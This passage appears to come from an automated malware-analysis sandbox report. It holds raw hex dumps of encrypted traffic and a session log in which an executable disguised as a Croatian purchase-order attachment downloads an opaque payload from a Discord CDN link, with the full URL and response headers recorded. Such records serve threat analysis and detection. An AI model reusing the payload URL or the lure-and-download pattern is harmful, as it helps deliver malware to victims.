af 58 2a c5 8e 88 7d ac a2 43 38 e4
              Data Ascii: )US`a%rhMd+2?r/`Hr@\3Y:gxo<r|y%VA0+c3y ^Heb -KFMmNi4ACCp%CCpH"+\3YW#}{|}.U%c=X*}C8
              2022-01-14 10:25:31 UTC286INData Raw: c2 15 16 fa f2 85 85 46 0f 7c ba 81 4d 9a ee fc 96 b4 94 8d 25 b1 38 c2 61 7e fa d4 39 25 b1 34 24 48 ff d6 aa 37 ea 6e 5b d2 e0 55 29 0a b8 74 24 a6 a3 51 a0 49 e9 c8 7f 8a d1 b6 fb 3d da 5f 45 41 f3 47 8c e9 dd 29 c1 d2 a5 17 97 72 6e 2f 82 02 7b 8c 5e bd c2 15 16 fa 18 98 33 11 0d 04 70 82 03 e1 2c 4c 58 e2 d7 81 fc 1d d9 43 35 6d 35 de 1b 74 78 55 d0 bd c2 1d 0c de da 02 a0 06 b9 4d 5e f4 48 cb 65 0b cc e7 2b 8b d7 08 b5 b4 35 65 03 6d 91 29 42 d5 b0 f8 72 ad 54 67 c5 e8 a9 db 85 0e 87 70 65 c2 9e 8d 2c bc c8 a6 9f 56 cc 91 26 bc 08 1b e6 60 b7 35 65 2b c4 52 d1 7a ba c8 ef 35 91 e5 2f 9c 0d fb ec 89 94 46 cf 7e b3 b8 33 95 fe 56 ea a2 0d 59 a4 5a 6e 91 22 b7 9c 00 68 46 03 ee 96 35 dd ae 69 e7 05 72 ae 62 90 95 32 96 b4 f6 6a d3 6a 61 ba e6 a4 02 e7
              Data Ascii: F|M%8a~9%4$H7n[U)t$QI=_EAG)rn/{^3p,LXC5m5txUM^He+5em)BrTgpe,V&`5e+Rz5/F~3VYZn"hF5irb2jja
              2022-01-14 10:25:31 UTC302INData Raw: 8f 4a 72 71 1d ff 97 fb 98 f9 c9 2e 88 b5 5c 7f 88 dd 1f a7 15 e1 97 bb ce 67 b8 3f f6 c0 e6 20 bf 80 84 c1 82 88 67 73 ab 72 6b 27 3e f1 5e 26 b9 0a 36 70 25 2a ca 9c 9c 48 b4 83 83 4e a3 2c 40 27 4b 80 32 d9 38 7b b5 f3 c2 9e 84 13 57 21 f3 09 64 00 e3 ca 53 5d 8d 8f 79 7d 3e d2 a6 92 20 31 11 86 d4 a2 8b 92 ad ec ed b1 f9 09 70 c7 f5 8d 20 ae e9 ac 42 bf 48 45 6b 6a 27 b7 39 60 48 47 83 fc d5 ca e6 5e 07 16 1b 24 5e f9 f0 84 72 a4 53 12 ce 39 ed a2 b9 be f4 07 08 86 6e 9b bf 02 2d c3 7c 7a 76 6d d8 f8 cc b8 14 94 af 6b d4 83 4b 4d 19 ce 45 8e 13 1d d8 81 8e e3 79 b9 0a 68 3a 28 45 80 83 65 f8 98 47 22 ce bb c2 d3 30 9b 98 fd 91 2f db 6a 1f a1 04 d7 81 8c 59 f8 00 20 a8 57 59 e8 66 05 0c 7d 00 b2 ff 91 61 41 87 ee 96 81 88 d9 08 fc 51 d6 cb e1 1a 35 52
              Data Ascii: Jrq.\g? gsrk'>^&6p%*HN,@'K28{W!dS]y}> 1p BHEkj'9`HG^$^rS9n-|zvmkKMEyh:(EeG"0/jY WYf}aAQ5R
              2022-01-14 10:25:31 UTC317INData Raw: f6 d7 9b 11 7f 75 9b 59 c8 51 b5 5c 52 69 b1 14 e6 4b 8e c9 c6 7f 63 af 07 96 d7 9b 4b e7 89 7e 20 dd bd fe c5 f2 f9 6b 8a c6 30 a0 be 7c 1c c3 e5 cd 8a f8 f9 6e 3f 01 c4 1a c4 6e 3a 9c b2 ad 17 6f a9 2c a8 a8 af 34 be 7a 1f 58 4b e0 07 a8 f2 f2 f4 f4 e2 39 14 ba 20 cf c6 7f 65 b5 56 26 d7 a7 36 b3 2b 37 14 e0 2a a4 a7 2a 9a d8 30 bb f2 e1 b4 a9 01 c4 68 3a 98 de 36 ad 49 ad 06 01 8b 7f 73 c8 23 51 fe f2 e3 bf fb 67 ad 38 87 7c 08 09 a4 8c 9e 91 60 72 2d 14 c0 43 3f 2c c9 c1 fd 7d 88 fc ee 12 e1 b5 27 61 90 d4 49 f9 69 b5 0a 50 3d 0e f3 63 a7 2b 69 d0 5a 46 64 20 cc 5f d3 c3 f2 ee 18 c2 4a 25 48 73 96 d2 5c 41 56 02 0d 70 01 8e d0 1a a1 38 8d 4e 7d a3 32 89 72 16 e8 69 a3 34 bc 66 28 b2 ad 00 1d 4a 6e 3f 5d b6 98 d7 a8 83 6d ac 87 76 09 d5 bf fd 6c 24 e8
              Data Ascii: uYQ\RiKcK~ k0|n?n:o,4zXK9 eV&6+7**0h:6Is#Qg8|`r-C?,}'aIiP=c+iZFd _J%Hs\AVp8N}2ri4f(Jn?]mvl$
              2022-01-14 10:25:31 UTC333INData Raw: f6 88 95 33 5a 2f 50 19 1d 28 c0 11 1d 28 c0 11 6c 23 54 46 2d 4b 8e a2 ce 30 d2 39 66 49 89 17 1a a1 51 9b 3f 77 b7 7c 79 f4 84 8c 9f 48 07 fb 23 35 5d b6 8f 5c 56 52 33 59 af 6b f5 06 74 68 4e 1a 71 e2 5c 37 a5 55 a4 d3 bb 86 93 2d 4b 8e a4 d3 bb 80 c3 97 36 db 77 ef f9 0f 09 fb 10 8b 1b 23 33 59 ad 60 7c 7a 76 69 60 3c ec 72 64 45 83 0a 7e 7f 07 f7 0b 06 7d fc 96 b0 4c 10 8b 1b 23 35 5f ba 24 b7 7c 7a 76 60 dc 4f 97 32 5d b6 fb 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 90 a4 d3 9b 3f 72 64 45 8c ae e9 ec 76 1c a6 d7 c4 1a a1 4c 10 8b 1b 40 db bf ea 02 08 17 7b 90 f9 7b 8a fa 90 c1 93 2d b4 08 79 f4 85 1e aa e0 58 4f fb 7a 10 a5 55 a4 d3 bb 86 90 a6 d7 c4 1a a1 4c 10 8f 24 b7 7d 44 ff 1f 2c c9 a5 45 80 83 09 d3 bb 86 92 c1 93 2d 4b 8e
              Data Ascii: 3Z/P((l#TF-K09fIQ?w|yH#5]\VR3YkthNq\7U-K6w#3Y`|zvi`<rdE~}L#5_$|zv`O2]$}2B)B?rdEvL@{{-yXOzUL$}D,E-K
              2022-01-14 10:25:31 UTC349INData Raw: 4c 10 8b 18 93 2d 4b 8e a2 ce 30 d1 bc 97 07 f7 09 fb 13 12 8f 24 b7 7e 75 eb f0 7b f8 8d 20 ac 0c d2 39 67 cc 2b 47 85 0e 87 11 e4 61 be 0c 82 87 13 10 6f 89 17 1b 23 35 5d b6 fb 13 10 6f dd d1 b6 fb 13 12 8d ed 6b e4 61 bc 08 79 f4 84 8c 9e c7 6d d9 c8 23 35 5d b6 f9 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa cd ae e8 69 d0 34 db cd ae ea b9 81 05 f3 02 6c 57 ab 6b 8d 20 af 6b d5 bf 8f 24 b7 7e 76 6d d9 c8 23 35 5d b5 7d a0 ca 26 bc 08 79 f4 84 8c 9d 46 03 ee 77 ef f9 0f 0b f4 dc 4f 96 b4 f6 88 95 32 d6 40 01 ea 6e 5b b1 70 60 3e 18 02 34 da b9 81 01 ea 6e 5b b1 70 60 3e 18 9d 43 7c 7a 76 6d db 25 66 49 88 95 32 d6 42 fa 91 2b af 6b d5 bf 8f 24 b7 7f bc 50 19 1e aa e0 58 2a c5 9c c3 2a c5 9c c1 93 2d 4b 8c 0e 87 13 12 8f 24 b7 7d fc 96 b4 f6 88
              Data Ascii: L-K0$~u{ 9g+Gao#5]okaym#5]2B)B)B)Bi4lWk k$~vm#5]}&yFwO2@n[p`>4n[p`>C|zvm%fI2B+k$PX**-K$}
              2022-01-14 10:25:31 UTC365INData Raw: b5 78 71 f1 fc 8f 18 8e eb e9 cb ac de 58 10 83 09 e2 63 c2 3b 2e cd ae f1 ff 05 cc 38 ad 6c 6c 5c 09 f3 01 ea 5a 6c 57 a8 cf fb 13 34 99 3a e8 69 f1 bc 08 79 f4 b1 30 d2 39 7f 3d 76 52 0e ce 3b 51 90 9c c9 a6 d7 f0 44 fe 9a a5 57 bb cf b9 ba 0f 33 51 98 b8 cb 97 36 df c6 2f 49 cb 3c ed e5 e2 5d 34 52 20 ae e9 ff 1d 3b 5b a8 9e 50 18 8c 9f 49 0b 89 2b 47 85 1d 29 5b f3 95 2a 85 09 e9 ed e5 f0 32 cf 95 39 5d bd b0 e5 e0 41 47 84 a2 f5 06 75 ea 7f 0a 45 8b 21 39 65 c7 aa da 4a 0b 18 9f 48 06 f7 81 3c ec 72 73 e4 72 55 a4 e7 df d5 bf 88 87 12 9e c4 11 3a e8 69 d5 e6 6e 03 e9 fe 9b 2e de 62 40 e8 5f ba 04 63 c2 1e f3 09 a3 56 34 da 5b a2 ff 1d 35 68 4e 14 83 5f bb 8d 14 94 af 78 70 61 af 6a 53 1d a1 7f 01 ea 7d cd af 7a 76 6c d5 36 ed f4 84 9b 3d 7c 33 52 26
              Data Ascii: xqXc;.8ll\ZlW4:iy09=vR;QDW3Q6/I<]4R ;[PI+G)[*29]AGuE!9eJH<rsrU:in.b@_cV4[5hN_xpajS}zvl6=|3R&
              2022-01-14 10:25:31 UTC381INData Raw: b5 78 71 e2 f9 3e f5 06 27 6a 02 33 1e e4 2e 81 50 1a a1 38 8a f0 5b c5 ee 18 f5 75 ee 75 e9 ec 00 09 93 4e 34 bf ea 00 0f 60 4f 91 28 c2 15 16 99 68 d7 c7 a0 8e eb bf d9 98 f4 87 13 66 28 af 07 91 2d 4f 95 32 d6 43 50 94 ac e5 a7 0b 4f c0 55 a7 59 ad 67 3b e9 ef f9 43 33 16 da 49 89 17 1a 56 59 ae e9 a0 85 41 3a a6 9e 92 a8 dc 4f 96 98 a0 c9 a5 12 c1 dc 03 bb 85 06 70 60 4e 75 83 69 f0 1f 49 e7 80 ea 1d 46 76 65 c6 1c a6 a3 3f 1a 81 61 db a3 36 b6 88 fb 66 69 b7 13 7d 90 a1 48 05 f3 67 bc 71 96 d1 cc 42 89 10 83 08 79 80 ed 9d 63 a7 3c 82 e0 31 27 50 6c 50 1d 2a c5 9c c1 0e 8f 20 ae 9d 2d 22 93 4a 65 a8 b0 e8 6d db cd da 24 de 56 22 b1 70 14 fa f8 ad 03 8b 75 8c f7 78 1f 59 8d 54 50 76 05 80 84 8e a0 ca 27 3e 54 69 d2 39 12 d0 46 77 9f 3c 82 ee 02 6f dd
              Data Ascii: xq>'j3.P8[uuN4`O(hf(-O2CPOUYg;C3IVYA:Op`NuiIFve?a6fi}HgqByc<1'PlP* -"Jem$V"puxYTPv'>Ti9Fw<o
              2022-01-14 10:25:31 UTC397INData Raw: 7f 5e 7f 4f d8 0a 2b 45 80 f7 65 ae c9 d1 c4 75 83 79 f1 ff 18 9d 31 35 35 3e d1 d2 5c 5d d1 df a6 d1 b7 79 f3 02 6c 55 ac ed f1 fd 18 9c 62 d8 42 fa d5 f6 c7 f6 d8 0a 7c 7a 76 6c b7 ec 76 6d 9c 95 6b 97 66 05 f1 fd 18 9c 64 4d 97 36 df d4 dd 41 7c 7a 33 0d 5d f4 d4 3f 73 92 ca 48 6b b3 70 64 41 78 71 e3 a3 dc 4b 8e e6 37 2e 9a f9 0d 04 70 61 8c 12 8b 1b 67 9e 8a ce 32 d6 42 fb 81 8e a6 d7 81 51 c2 57 aa e8 6f dd a3 30 ba 67 ec 16 fd 76 0a 17 69 be 79 fc 97 32 d6 36 b1 19 3f 17 7f 6f ba 6d aa 8e d7 e4 06 1b 4c 7c 7d f8 89 17 7f 71 9b 4b eb 8a f0 08 7e 77 eb f0 0f 67 a5 75 8f 41 16 ff 75 98 d6 37 66 4d 96 b4 f6 88 44 f6 8d 20 da 24 de 73 81 6b ba 68 4b 8a 9d 43 08 17 73 e3 da 4e 14 e0 36 b6 db a9 3b 04 17 73 95 5c 46 23 41 0a 11 65 b4 f1 ff 18 9d 43 7d ec
              Data Ascii: ^O+Eeuy155>\]ylUbB|zvlvmkfdM6A|z3]?sHkpdAxqK7.pag2BQWo0gviy26?omL|}qK~wguAu7fMD $skhKCsN6;s\F#AeC}
              2022-01-14 10:25:31 UTC413INData Raw: f9 9f d8 46 03 86 56 03 11 9d d3 bb 86 f8 db e8 96 24 27 3e f1 95 d4 18 62 d1 26 bc 08 11 c3 b2 0d 94 3f 73 e6 0d ca 02 93 bd 1a a1 4c 78 bf aa 1f bc 98 b8 ff 74 a6 f2 7f 91 b9 81 05 9b f9 2a 3a 78 e1 da 4a 63 75 ce cf 22 23 35 5d de f5 23 ca b7 ed f4 84 e4 c7 85 f1 6d 49 89 17 72 a2 eb 0f 99 aa e0 58 42 3c c9 5a bf 1f 2c c9 cc 6d fc 69 40 65 c7 a0 a3 07 d2 c6 8e 32 d6 42 92 15 33 a6 47 15 16 98 d1 d8 63 3c 7c ea 6e 5b d8 00 4d 6d d9 c8 23 35 5d 32 c9 aa 70 f0 7b f8 e4 b7 58 d5 2f c0 11 0d 6e 4d b7 82 17 8a 99 3a 82 91 0c 7d 6c c7 a0 ca 4e c2 30 2d db 5d b6 fb 7a 90 83 f5 96 24 b7 7d 95 8c bb 79 64 d5 bf 8f 4d 74 4d 6d 49 19 1f 2c a3 67 e9 13 82 17 1a a1 26 8a bc f7 9b af 6b d5 d5 a9 7b 07 67 5c 33 59 c7 c6 3b 95 a2 5e 38 e4 0b 3e d4 c2 85 9e c5 9c a8 22
              Data Ascii: FV$'>b&?sLxt*:xJcu"#5]#mIrXB<Z,mi@e2B3Gc<|n[Mm#5]2p{X/nM:}lN0-]z$}ydMtMmI,g&k{g\3Y;^8>"
              2022-01-14 10:25:31 UTC429INData Raw: 8d 99 c5 62 9c 5c db cd ea e7 73 f3 89 17 5e b1 d4 85 f1 03 24 6a ba 11 e6 9a 43 a1 f8 65 c7 e4 e8 fd 0d 8f 24 f3 8b bf 37 9e 3b a0 3e 19 08 0d c4 9e 3a 17 0c 7b 10 8b 5f 33 cd 0f f6 76 b2 89 ff 1c e2 d5 2b ff cc a0 35 a3 b3 3b 82 87 52 95 ca a2 ca ac 1a 5e 5d fd f0 7b f8 8d 21 89 17 1a a1 4f 2d b4 09 fb 21 d9 c8 62 14 80 eb f8 e7 a7 33 09 fb 57 21 2d ea 91 d6 be 7a 9e c5 dd a2 b2 4a 0b 41 0b 8c 24 b7 39 ef e5 5a d0 cb a9 04 98 b8 be 59 b9 e9 e4 0b 40 9f 18 9d 07 7e 67 6d 26 43 80 1d c0 11 4c 63 bf 37 61 ff 6f bd 30 d2 7d 75 f3 bb 79 0a b5 06 9d 46 e8 96 4a d4 c4 f2 80 c7 29 3a 50 c9 2e 32 28 22 7e 97 f6 cd 25 c5 63 d1 1b cb 69 85 83 4a f4 7a ba d2 d1 b6 fb 13 76 d5 96 c0 d1 32 29 bd 79 7c 92 fb 53 60 c2 d9 23 dd d1 b6 fb 77 57 57 57 5c f2 68 4e 50 90 86
              Data Ascii: b\s^$jCe$7;>:{_3v+5;R^]{!O-!b3W!-zJA$9ZY@~gm&CLc7ao0}uyFJ):P.2("~%ciJzv2)y|S`#wWWW\hNP
              2022-01-14 10:25:31 UTC445INData Raw: cb c1 83 83 6e 02 35 07 37 52 ae 9c c1 ab e2 5f 31 57 57 aa 95 38 dc cf b1 fb 10 74 6a 27 33 61 3e f2 0b 38 b5 87 1b a8 20 eb 7b 08 2c 42 05 0c 9c a4 3b 9e 90 2d bb c3 1a 55 e9 c7 ab e9 02 19 1c 8a 9d 37 6b f9 07 83 ca a3 51 11 0e 0c 81 fa 93 c6 ea 2b ce 33 d2 7f ea 21 45 80 b8 7c 49 00 2c 9b c0 01 61 42 bf 04 50 90 c2 25 c5 f8 8d 61 9c 44 96 e1 1a 92 54 dd 24 0e 6f 21 74 e3 fe 13 76 5d 49 ed f4 c5 be ae 81 50 d9 fb eb ad ea 92 ee fe 68 c5 6c 1a 28 09 c8 75 b8 0f cd 2d a7 d2 6c c7 63 9e 9c 9a e3 2e 26 43 83 1d 64 ac 26 43 83 17 ec 9a 41 3d e2 5c 72 45 52 75 fb 9a d9 91 70 3a 28 f3 2e 9c 3e f9 84 4f 1c 5a 7a fd e7 18 bd 87 fb c5 17 e6 20 23 15 9f 2c f9 f0 1f 2c 88 b4 3d 07 a2 0e b4 2e 46 f1 76 3b 39 66 23 d9 43 29 42 ba 89 d4 66 17 16 c9 5a 27 b5 74 2b cc
              Data Ascii: n57R_1WW8tj'3a>8 {,B;-U7kQ+3!E|I,aBP%aDT$o!tv]IPhl(u-lc.&Cd&CA=\rERup:(.>OZz #,,=.Fv;9f#C)BfZ't+
              2022-01-14 10:25:31 UTC461INData Raw: 6a 36 df 95 d0 d3 d3 ee b7 4e cc a0 38 6f 39 2b ce d8 0b 89 fb 5e b1 b9 b2 a4 80 67 08 fa 7d 77 ba c7 fd 41 88 7e 80 7c 2c 00 81 c6 e1 25 67 bf 67 30 97 bb 86 d0 d6 17 72 74 e1 be 55 fd 42 3a db 32 29 15 0a 96 4b 71 25 5f 52 1d 68 92 f3 a3 50 ab 9e 88 1e 55 5b cb a1 a4 d3 ff 6c 87 b2 0e d2 b4 d6 cb cd 9e 3a 8c 9e 85 ec 3c 84 d9 08 4a 0b 6a be 87 46 c0 4c f5 8d 7b a6 3c 07 08 86 c7 80 6a 91 d6 bd d7 2a 2d 4b 8e a2 cd 14 70 25 b7 7d bc e9 12 e7 f7 82 e3 87 4a 51 5b 82 78 8e f5 7e 97 c9 5a e8 94 47 85 4e c8 9f e9 ed 46 e7 aa 6b 2a 3a 92 cf 5a 2f 14 fb eb 51 7f 54 af 6a 38 b4 06 30 5f b1 8c db 0b f8 c8 aa 08 3c 67 cc 2b 5c 5a c7 66 c2 fd 4d 1f 27 ca 62 87 e3 9b b6 17 5f 31 54 22 a8 a1 a4 10 00 84 d9 45 a0 43 18 ad 98 dc 4f d7 25 cd c6 4b 4e 27 e6 ee 85 85 ea
              Data Ascii: j6N8o9+^g}wA~|,%gg0rtUB:2)Kq%_RhPU[l:<JjFL{<j*-Kp%}JQ[x~ZGNFk*:Z/QTj80_<g+\ZfM'b_1T"ECO%KN'
              2022-01-14 10:25:31 UTC477INData Raw: 4f ca 7e 24 e9 b3 8b e4 d8 ff f4 57 23 8d 24 3c 10 ce bb 8b 6e 5b 8a 1a 5e c7 5f d1 5e ee fc 5f 89 eb b0 66 59 e8 e2 0f 01 b7 f6 78 fa 6b 5e c4 57 21 66 1f 7f 50 f5 8d 75 28 9b 61 e1 80 40 7e 7d 17 3e f5 8c 9b 41 b8 7a 89 e8 d6 02 84 db 9b 6f d9 ec 36 52 1f 46 fb 98 4a 80 5a a4 82 d0 62 12 4f 1c a6 d3 79 a9 bb 0d 5f e4 9e 3a 76 6b 3d b9 0a bd 01 e3 35 a2 31 ca 8a 71 21 ba fb ec 8d 20 3b e7 ae 21 ba 16 e6 a5 d0 cb 56 99 bb 6e 0b 52 4c ef 06 8a 99 b7 f0 7b f8 8c 9e ad 6f 80 08 88 1e fc c5 63 3c 13 12 4b 0f e5 68 1b b3 b7 26 bc 08 78 71 26 3d 90 59 33 b4 1e 3b a1 c7 74 e3 33 2d 46 e9 6c a5 27 1f c6 9e 3a ec 26 36 d1 c8 e3 5b f9 0e 6c a8 23 8a fd f0 7b f8 bf 8f 4c 10 e1 8a 99 50 4b 86 b4 a2 43 7c 7a 77 ef 91 29 28 1a 2a 3a 17 e5 e3 1a 20 fd 18 9d 43 7c b9 da
              Data Ascii: O~$W#$<n[^_^_fYxk^W!fPu(a@~}>Azo6RFJZbOy_:vk=51q! ;!VnRL{oc<Kh&xq&=Y3;t3-Fl':&6[l#{LPKC|zw)(*: C|
              2022-01-14 10:25:31 UTC493INData Raw: 68 8e 29 42 be 9e ed d1 49 49 02 6c 13 80 af 4e eb 30 59 ad 23 a7 69 f5 f9 cf 39 66 0d 96 80 a6 28 00 e3 de 17 88 ad 42 05 33 d2 39 22 21 09 de ac 25 b1 70 24 25 06 50 e6 a5 de 53 db 5f fa b4 09 3b e1 da 0e 15 52 38 1b e3 55 a4 97 a4 9b 1a 5e f8 06 75 af f9 43 59 52 dd 5a 2f 14 06 25 1f d3 7b 73 e6 21 a3 05 d6 bd 4a 80 83 4e 86 c8 06 8a 59 26 bc 4c 82 db e8 96 74 e3 de 17 88 f5 23 ca e7 6c 57 ec e0 3c c9 5a ef 72 64 01 78 19 3a 17 da c1 93 69 42 96 91 d6 82 0c 82 c3 05 83 2f af ab e9 ec 36 4d e6 40 0a be 87 13 56 b4 82 a2 31 94 24 b7 39 f4 fc b3 8b db 46 03 aa 72 18 b8 00 a8 57 a8 98 2a 45 a5 aa 20 25 3a ac 77 6b f0 84 4c 9b 3f 37 f3 8a bc f7 cb 22 b3 30 40 79 d1 49 49 02 6c 13 80 13 37 9e 05 78 71 a6 45 14 b1 8f e4 ea 6e 1f be 94 8a 66 89 9c c1 d7 56 ba
              Data Ascii: h)BIIlN0Y#i9f(B39"!%p$%PS_;R8U^uCYRZ/%{s!JNY&Lt#lW<Zrdx:iB/6M@V1$9FrW*E %:wkL?7"0@yIIl7xqEnfV
              2022-01-14 10:25:31 UTC509INData Raw: 75 68 48 8e 5d 49 76 36 37 a2 45 8e dd d1 b6 eb f0 80 02 1a 4a 0c 0b 06 fe 9c b5 7f 3a ee fc 9e 87 9a aa 6b 27 41 70 3a d3 ad ec 64 cc 2f 02 e7 f1 76 65 9d ca 31 df d5 bf 8f be 82 88 4d a9 56 66 c2 13 99 3c 65 c0 9a bd 8a 99 91 a7 56 2e 95 09 fd 93 2b ce 30 96 32 de f2 80 c7 26 a8 61 be 48 81 15 a9 56 02 18 10 53 14 60 f8 0e d2 6e 0d 57 a8 9c 4c d3 e1 d8 cd 49 fc 96 b4 f2 81 38 a4 db b8 ff 26 3f 79 7d 08 f8 c1 18 9d 07 71 fe 97 bd 93 52 1d 28 c4 1a 9c c3 6f 1c a5 95 b1 73 9f 88 10 81 8c 57 9b eb 7b a9 5e 78 fc 55 ff 42 a0 93 2c 79 f6 63 03 dd d5 ca e7 63 3c 13 ed d2 d1 72 ef f2 f4 84 a8 e0 db 32 29 b5 13 fa 52 96 b0 bb 0b cc a0 12 04 82 0c 7a b2 71 b4 a5 c5 5f e1 80 da 4b 3e f3 e9 2c fa 95 47 45 04 8f db 32 81 ed 30 59 a6 a3 51 bf b3 f7 f4 7b 0e 73 0e 83
              Data Ascii: uhH]Iv67EJ:k'Ap:d/ve1MVf<eV.+02&aHVS`nWLI8&?y}qR(osW{^xUB,ycc<r2)Rzq_K>,GE20YQ{s


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.449778162.159.135.233443C:\Users\user\Desktop\Nova narudzba u prilogu.exe
              TimestampkBytes transferredDirectionData
              2022-01-14 10:26:09 UTC514OUTGET /attachments/909752051695775778/931434691809124392/Ajshkennychvrlvyqvxklxbhfqfzgvr HTTP/1.1
              User-Agent: 42
              Host: cdn.discordapp.com
              Cache-Control: no-cache
              2022-01-14 10:26:09 UTC515INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 10:26:09 GMT
              Content-Type: application/octet-stream
              Content-Length: 466432
              Connection: close
              CF-Ray: 6cd62a16b8185c50-FRA
              Accept-Ranges: bytes
              Age: 7936
              Cache-Control: public, max-age=31536000
              Content-Disposition: attachment;%20filename=Ajshkennychvrlvyqvxklxbhfqfzgvr
              ETag: "160f746c3471a01d756cd5438ae7899d"
              Expires: Sat, 14 Jan 2023 10:26:09 GMT
              Last-Modified: Fri, 14 Jan 2022 06:28:55 GMT
              Vary: Accept-Encoding
              CF-Cache-Status: HIT
              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              x-goog-generation: 1642141735792380
              x-goog-hash: crc32c=BMufiQ==
              x-goog-hash: md5=Fg90bDRxoB11bNVDiueJnQ==
              x-goog-metageneration: 1
              x-goog-storage-class: STANDARD
              x-goog-stored-content-encoding: identity
              x-goog-stored-content-length: 466432
              X-GUploader-UploadID: ADPycdvgVw86lNODc_FUvxJ5vBPBPwu7yWNJ-fM7Bf9Y4Jwa0j518QQwomxRFtc2-ZlqlgwH5n6LpEXFuy97oIiXV5o
              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
              2022-01-14 10:26:09 UTC516INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 7a 73 47 39 56 4c 6c 4e 53 25 32 42 37 5a 47 37 72 78 43 39 68 34 42 6a 6b 58 39 67 39 65 25 32 42 66 41 6d 25 32 46 4d 50 25 32 42 6c 52 31 72 52 65 5a 46 4a 50 72 41 37 4d 36 49 7a 6e 6a 76 57 52 79 78 67 66 42 6e 39 57 6d 4c 30 25 32 46 71 4c 61 5a 56 46 33 5a 67 5a 72 32 5a 76 34 66 46 36 46 39 54 67 4e 33 77 62 75 6f 45 49 72 6b 66 4b 35 65 4a 56 4e 53 71 49 68 32 7a 56 6c 5a 68 61 56 6a 5a 25 32 42 4b 70 77 53 52 67 57 67 76 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zsG9VLlNS%2B7ZG7rxC9h4BjkX9g9e%2BfAm%2FMP%2BlR1rReZFJPrA7M6IznjvWRyxgfBn9WmL0%2FqLaZVF3ZgZr2Zv4fF6F9TgN3wbuoEIrkfK5eJVNSqIh2zVlZhaVjZ%2BKpwSRgWgvQ%3D%3D"}],"group":"cf-nel","max
              2022-01-14 10:26:09 UTC516INData Raw: 18 da 04 39 22 f7 4a 5b f6 c6 57 ec 36 9e 95 6a 0a 39 28 89 53 db 8c ce 77 a1 05 b7 39 27 6e 03 b6 bc 46 4a 4f d3 fa c1 d4 73 af 2f 14 d5 ef a1 14 d3 f5 4f d3 ff 5d e6 22 fd 51 df 91 68 1e f2 d8 01 a4 9a f9 4b cf e2 1b 6d 90 e2 18 dc 1f 74 30 95 7c 33 1d 6c 16 c8 64 0b 49 cd ea 2f 00 30 8a de 1d 61 fa d5 fe ca 60 72 2d 0f 4d d3 eb a8 84 cb e7 ae ad 23 74 38 a3 1f 65 83 4e 55 f4 dc 17 5d f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f1 b3 3d 2b 03 af 3b 32 8e e5 ad 2e 89 53 de 03 a9 10 c2 51 df 94 ff 44 a6 90 e8 20 ea 2a 84 dc 08 37 28 84 c8 62 11 55 fc d1 f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f2 c1 c3 f5 63 a2 a1 1c f4 d7 a2 aa b2 a1 23 67 fc a6 8f 73 bf da 65 93 7e 2d 24 92 9b 0f 7f 53 f0 2b 62 6b b1 1f 78
              Data Ascii: 9"J[W6j9(Sw9'nFJOs/O]"QhKmt0|3ldI/0a`r-M#t8eNU]^|;:%sI~6{=+;2.SQD *7(bU^|;:%sI~6{c#gse~-$S+bkx
              2022-01-14 10:26:09 UTC517INData Raw: a8 39 9d aa 11 e4 86 62 a6 38 14 7b 1e 4e fa 76 96 4e f3 e8 8a 7a 88 67 28 25 ca c0 e0 a1 a9 b8 05 0b ef 1b c6 e6 98 40 1e 45 71 1f d2 c6 fe 62 a6 3e 00 98 5f 43 8d c0 f3 e4 9e 21 d6 b9 66 ad 9d a1 a0 20 4d 7f eb 1b c6 f2 6a a2 23 d4 c4 ff e1 3b 8e 42 19 f2 79 16 69 28 26 5f 40 0c 61 4f 6f 26 56 d9 21 d1 47 63 38 0e 78 8d c0 f4 69 31 bf 76 94 40 18 73 0b e5 1c 5e d2 c4 e8 8e 43 8c 60 da a7 a7 be ea 87 f2 67 3e 1e 40 12 77 0c 61 50 f2 7a 94 5d 48 fd e5 05 01 0f e7 0c 60 c4 fc 66 b1 99 c2 ec 8f c7 50 f8 6c ab 99 d5 44 03 0d f6 75 15 e9 0f e6 9d a7 a5 a9 bb 67 29 b9 63 21 d5 4f 79 12 61 50 ff e4 93 c7 59 51 7f f9 f1 1f cc db 35 a7 b6 12 66 aa 09 1b c0 fb f2 69 2e 2b ac 04 97 d0 d2 d9 2b a2 3c 16 69 32 3c 12 71 1f c7 58 d0 da b6 09 1b c6 fd e1 3b 8b e0 bd 60
              Data Ascii: 9b8{NvNzg(%@Eqb>_C!f Mj#;Byi(&_@aOo&V!Gc8xi1v@s^C`g>@waPz]H`fPlDug)c!OyaPYQ5fi.++<i2<qX;`
